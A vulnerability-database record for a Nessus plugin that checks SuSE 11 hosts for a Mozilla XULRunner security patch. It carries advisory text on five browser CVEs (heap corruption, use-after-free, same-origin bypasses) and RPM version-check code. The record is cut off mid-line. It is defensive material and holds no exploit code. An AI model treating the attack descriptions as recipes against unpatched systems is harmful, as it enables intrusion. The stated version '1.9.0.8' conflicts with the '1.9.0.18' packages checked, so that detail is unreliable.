{"id": "SUSE_11_MOZILLA-XULRUNNER190-100219.NASL", "bulletinFamily": "scanner", "title": "SuSE 11 Security Update : Mozilla XULRunner (SAT Patch Number 2033)", "description": "Mozilla XUL Runner engine 1.9.0 was upgraded to version 1.9.0.8, fixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via TippingPoint's Zero Day Initiative that Mozilla's implementation of Web Workers contained an error in its handling of array data types when processing posted messages. This error could be used by an attacker to corrupt heap memory and crash the browser, potentially running arbitrary code on a victim's computer. (MFSA 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research reported that the HTML parser incorrectly freed used memory when insufficient space was available to process remaining input. Under such circumstances, memory occupied by in-use objects was freed and could later be filled with attacker-controlled text. These conditions could result in the execution or arbitrary code if methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft Vulnerability Research reported that the properties set on an object passed to showModalDialog were readable by the document contained in the dialog, even when the document was from a different domain. This is a violation of the same-origin policy and could result in a website running untrusted JavaScript if it assumed the dialogArguments could not be initialized by another site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day Initiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported that when a SVG document which is served with Content-Type: application/octet-stream is embedded into another document via an tag with type='image/svg+xml', the Content-Type is ignored and the SVG document is processed normally. A website which allows arbitrary binary data to be uploaded but which relies on Content-Type: application/octet-stream to prevent script execution could have such protection bypassed. An attacker could upload a SVG document containing JavaScript as a binary file to a website, embed the SVG document into a malicous page on another site, and gain access to the script environment from the SVG-serving site, bypassing the same-origin policy. (MFSA 2010-05 / CVE-2010-0162)", "published": "2010-02-25T00:00:00", "modified": "2016-12-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=44909", "reporter": "Tenable", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=576969", "http://www.mozilla.org/security/announce/2010/mfsa2010-03.html", "http://support.novell.com/security/cve/CVE-2010-0159.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-02.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-05.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-04.html", "http://support.novell.com/security/cve/CVE-2009-3988.html", "http://support.novell.com/security/cve/CVE-2009-1571.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-01.html", "http://support.novell.com/security/cve/CVE-2010-0160.html", "http://support.novell.com/security/cve/CVE-2010-0162.html"], "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "type": "nessus", "lastseen": "2018-09-02T00:00:52", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Mozilla XUL Runner engine 1.9.0 was upgraded to version 1.9.0.8, fixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via TippingPoint's Zero Day Initiative that Mozilla's implementation of Web Workers contained an error in its handling of array data types when processing posted messages. This error could be used by an attacker to corrupt heap memory and crash the browser, potentially running arbitrary code on a victim's computer. (MFSA 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research reported that the HTML parser incorrectly freed used memory when insufficient space was available to process remaining input. Under such circumstances, memory occupied by in-use objects was freed and could later be filled with attacker-controlled text. These conditions could result in the execution or arbitrary code if methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft Vulnerability Research reported that the properties set on an object passed to showModalDialog were readable by the document contained in the dialog, even when the document was from a different domain. This is a violation of the same-origin policy and could result in a website running untrusted JavaScript if it assumed the dialogArguments could not be initialized by another site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day Initiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported that when a SVG document which is served with Content-Type: application/octet-stream is embedded into another document via an tag with type='image/svg+xml', the Content-Type is ignored and the SVG document is processed normally. A website which allows arbitrary binary data to be uploaded but which relies on Content-Type: application/octet-stream to prevent script execution could have such protection bypassed. An attacker could upload a SVG document containing JavaScript as a binary file to a website, embed the SVG document into a malicous page on another site, and gain access to the script environment from the SVG-serving site, bypassing the same-origin policy. (MFSA 2010-05 / CVE-2010-0162)", "edition": 2, "enchantments": {}, "hash": "29b2121ba886facb49405177d2de129a6e9aea0e60564b3e7db255dbce5269c9", "hashmap": [{"hash": "ab3f1038294b2799bcc02c9464f5952d", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "52a5411e7f071cae984d40f6bc064674", "key": "title"}, {"hash": "dbfc53466ca83eb2eefb40bea32f0b30", "key": "cvelist"}, {"hash": "b4a6e2d3ea9db02b543b396cfe424eb8", "key": "published"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3befc94faf03f2e4f184edfa4abb681f", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "8fd3c0d10643d313d61153df455e9f87", "key": "modified"}, {"hash": "273ea7552f2fedc728d1462e7791434b", "key": "pluginID"}, {"hash": "e938db2f4082460794bd2e693f4f3112", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "740a0956994833a204c3db234be57d8d", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44909", "id": "SUSE_11_MOZILLA-XULRUNNER190-100219.NASL", "lastseen": "2016-12-22T06:12:56", "modified": "2016-12-21T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.2", "pluginID": "44909", "published": "2010-02-25T00:00:00", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=576969", "http://www.mozilla.org/security/announce/2010/mfsa2010-03.html", "http://support.novell.com/security/cve/CVE-2010-0159.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-02.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-05.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-04.html", "http://support.novell.com/security/cve/CVE-2009-3988.html", "http://support.novell.com/security/cve/CVE-2009-1571.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-01.html", "http://support.novell.com/security/cve/CVE-2010-0160.html", "http://support.novell.com/security/cve/CVE-2010-0162.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44909);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:20 $\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n\n script_name(english:\"SuSE 11 Security Update : Mozilla XULRunner (SAT Patch Number 2033)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla XUL Runner engine 1.9.0 was upgraded to version 1.9.0.8,\nfixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several\n stability bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these crashes\n showed evidence of memory corruption under certain\n circumstances and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via\n TippingPoint's Zero Day Initiative that Mozilla's\n implementation of Web Workers contained an error in its\n handling of array data types when processing posted\n messages. This error could be used by an attacker to\n corrupt heap memory and crash the browser, potentially\n running arbitrary code on a victim's computer. (MFSA\n 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported that the HTML parser incorrectly freed used\n memory when insufficient space was available to process\n remaining input. Under such circumstances, memory\n occupied by in-use objects was freed and could later be\n filled with attacker-controlled text. These conditions\n could result in the execution or arbitrary code if\n methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft\n Vulnerability Research reported that the properties set\n on an object passed to showModalDialog were readable by\n the document contained in the dialog, even when the\n document was from a different domain. This is a\n violation of the same-origin policy and could result in\n a website running untrusted JavaScript if it assumed the\n dialogArguments could not be initialized by another\n site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day\nInitiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported\n that when a SVG document which is served with\n Content-Type: application/octet-stream is embedded into\n another document via an tag with type='image/svg+xml',\n the Content-Type is ignored and the SVG document is\n processed normally. A website which allows arbitrary\n binary data to be uploaded but which relies on\n Content-Type: application/octet-stream to prevent script\n execution could have such protection bypassed. An\n attacker could upload a SVG document containing\n JavaScript as a binary file to a website, embed the SVG\n document into a malicous page on another site, and gain\n access to the script environment from the SVG-serving\n site, bypassing the same-origin policy. (MFSA 2010-05 /\n CVE-2010-0162)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-01.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-03.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-04.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-05.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=576969\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1571.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0159.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0160.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0162.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 2033.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 94, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-translations-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "SuSE 11 Security Update : Mozilla XULRunner (SAT Patch Number 2033)", "type": "nessus", "viewCount": 1}, "differentElements": ["cpe"], "edition": 2, "lastseen": "2016-12-22T06:12:56"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs-32bit"], "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Mozilla XUL Runner engine 1.9.0 was upgraded to version 1.9.0.8, fixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via TippingPoint's Zero Day Initiative that Mozilla's implementation of Web Workers contained an error in its handling of array data types when processing posted messages. This error could be used by an attacker to corrupt heap memory and crash the browser, potentially running arbitrary code on a victim's computer. (MFSA 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research reported that the HTML parser incorrectly freed used memory when insufficient space was available to process remaining input. Under such circumstances, memory occupied by in-use objects was freed and could later be filled with attacker-controlled text. These conditions could result in the execution or arbitrary code if methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft Vulnerability Research reported that the properties set on an object passed to showModalDialog were readable by the document contained in the dialog, even when the document was from a different domain. This is a violation of the same-origin policy and could result in a website running untrusted JavaScript if it assumed the dialogArguments could not be initialized by another site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day Initiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported that when a SVG document which is served with Content-Type: application/octet-stream is embedded into another document via an tag with type='image/svg+xml', the Content-Type is ignored and the SVG document is processed normally. A website which allows arbitrary binary data to be uploaded but which relies on Content-Type: application/octet-stream to prevent script execution could have such protection bypassed. An attacker could upload a SVG document containing JavaScript as a binary file to a website, embed the SVG document into a malicous page on another site, and gain access to the script environment from the SVG-serving site, bypassing the same-origin policy. (MFSA 2010-05 / CVE-2010-0162)", "edition": 4, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "hash": "fe6f979670fa02db991fc9cf5bb508bd846b8bf67107dd8a854a2c79e91b6adc", "hashmap": [{"hash": "ab3f1038294b2799bcc02c9464f5952d", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "52a5411e7f071cae984d40f6bc064674", "key": "title"}, {"hash": "dbfc53466ca83eb2eefb40bea32f0b30", "key": "cvelist"}, {"hash": "b4a6e2d3ea9db02b543b396cfe424eb8", "key": "published"}, {"hash": "3befc94faf03f2e4f184edfa4abb681f", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "8fd3c0d10643d313d61153df455e9f87", "key": "modified"}, {"hash": "cf10a5824dfd44d4c24d75f296a10058", "key": "cpe"}, {"hash": "273ea7552f2fedc728d1462e7791434b", "key": "pluginID"}, {"hash": "e938db2f4082460794bd2e693f4f3112", "key": "references"}, {"hash": "740a0956994833a204c3db234be57d8d", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44909", "id": "SUSE_11_MOZILLA-XULRUNNER190-100219.NASL", "lastseen": "2018-08-30T19:52:13", "modified": "2016-12-21T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "44909", "published": "2010-02-25T00:00:00", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=576969", "http://www.mozilla.org/security/announce/2010/mfsa2010-03.html", "http://support.novell.com/security/cve/CVE-2010-0159.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-02.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-05.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-04.html", "http://support.novell.com/security/cve/CVE-2009-3988.html", "http://support.novell.com/security/cve/CVE-2009-1571.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-01.html", "http://support.novell.com/security/cve/CVE-2010-0160.html", "http://support.novell.com/security/cve/CVE-2010-0162.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44909);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:20 $\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n\n script_name(english:\"SuSE 11 Security Update : Mozilla XULRunner (SAT Patch Number 2033)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla XUL Runner engine 1.9.0 was upgraded to version 1.9.0.8,\nfixing various bugs and security issues.\n\nThe following security issues have been fixed :\n\n - Mozilla developers identified and fixed several\n stability bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these crashes\n showed evidence of memory corruption under certain\n circumstances and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2010-01 / CVE-2010-0159)\n\n - Security researcher Orlando Barrera II reported via\n TippingPoint's Zero Day Initiative that Mozilla's\n implementation of Web Workers contained an error in its\n handling of array data types when processing posted\n messages. This error could be used by an attacker to\n corrupt heap memory and crash the browser, potentially\n running arbitrary code on a victim's computer. (MFSA\n 2010-02 / CVE-2010-0160)\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported that the HTML parser incorrectly freed used\n memory when insufficient space was available to process\n remaining input. Under such circumstances, memory\n occupied by in-use objects was freed and could later be\n filled with attacker-controlled text. These conditions\n could result in the execution or arbitrary code if\n methods on the freed objects were subsequently called.\n (MFSA 2010-03 / CVE-2009-1571)\n\n - Security researcher Hidetake Jo of Microsoft\n Vulnerability Research reported that the properties set\n on an object passed to showModalDialog were readable by\n the document contained in the dialog, even when the\n document was from a different domain. This is a\n violation of the same-origin policy and could result in\n a website running untrusted JavaScript if it assumed the\n dialogArguments could not be initialized by another\n site. (MFSA 2010-04 / CVE-2009-3988)\n\nAn anonymous security researcher, via TippingPoint's Zero Day\nInitiative, also independently reported this issue to Mozilla.\n\n - Mozilla security researcher Georgi Guninski reported\n that when a SVG document which is served with\n Content-Type: application/octet-stream is embedded into\n another document via an tag with type='image/svg+xml',\n the Content-Type is ignored and the SVG document is\n processed normally. A website which allows arbitrary\n binary data to be uploaded but which relies on\n Content-Type: application/octet-stream to prevent script\n execution could have such protection bypassed. An\n attacker could upload a SVG document containing\n JavaScript as a binary file to a website, embed the SVG\n document into a malicous page on another site, and gain\n access to the script environment from the SVG-serving\n site, bypassing the same-origin policy. (MFSA 2010-05 /\n CVE-2010-0162)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-01.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-03.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-04.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-05.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=576969\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1571.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0159.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0160.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0162.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 2033.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 94, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-gnomevfs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner190-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, 